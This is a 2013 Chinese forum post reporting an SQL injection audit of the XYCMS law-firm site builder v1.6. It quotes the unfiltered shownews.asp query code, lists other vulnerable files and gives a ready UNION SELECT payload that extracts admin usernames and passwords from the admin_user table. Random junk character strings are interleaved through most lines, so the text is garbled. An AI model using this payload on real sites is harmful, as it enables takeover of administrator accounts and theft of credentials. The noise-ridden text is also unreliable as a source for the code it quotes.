前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
7 ~2 n* i! u# Q
0 b; u9 m; g& l: x( s0 w3 p淫荡分割线
6 q" ~/ O% A4 j3 G--------------------------------------------------------& h: } I( y4 V7 N( Q! ^4 A
# p& o4 s7 T& Q# I0 K审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
5 m! `1 S) L/ d, G8 \" T! z" a源码地址:http://down.chinaz.com/soft/29233.htm$ o; u y# U$ O- b2 F! \
7 @9 ~5 W% }5 A4 g漏洞文件:shownews.asp
, `( y" T# v8 S; b( z漏洞代码:7-13行$ O" S! k V# h5 S* X' q, R
: P5 a. Y1 U* E% K; K! _
& E$ k4 G, @1 j3 u9 `5 t/ Q$ a) F3 m<% 9 x1 D4 h3 L+ f
id=request.QueryString("id")
& [% W( I" {8 s7 s( W8 N( r% `
/ L5 x6 M" \# V$ ^, h+ qset snews=server.createobject("adodb.recordset")
! i( G* g% v3 c s2 U7 x7 bexec="select * from [news] where id="&id
2 h6 N. ?' n2 T8 @9 Osnews.open exec,conn,1,12 }2 C& ]* T! A" O
%>
, P, E" E; h# Y) {- B. K3 H
- ]# K5 t1 D+ }( V7 x6 h1 k / j& o8 t6 a m8 x5 W
什么过滤都没有 直造成注入
2 @ z0 }0 a6 o7 h1 ]6 I- P& d
& n6 L/ D I% e* D4 G2 b p注入点:http://127.0.0.1:99/shownews.asp?id=xx P' v9 k: S/ M, e+ n
) O6 v% V$ S2 s1 {, q) `8 n/ o% M其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
, U0 X5 c/ U- Q" z- ]( j+ \7 B
" ]7 s( h$ t5 l% ` % j* M; Y7 C* X% T
exp: union select 1,admin,password,4,5,7 from admin_user' ~6 b% U I0 V" h; m' s S3 ~, o% j
) ^( ^! a) v; m3 N0 m) m
|
发表于 2013-4-4 17:28:12
收藏
支持
反对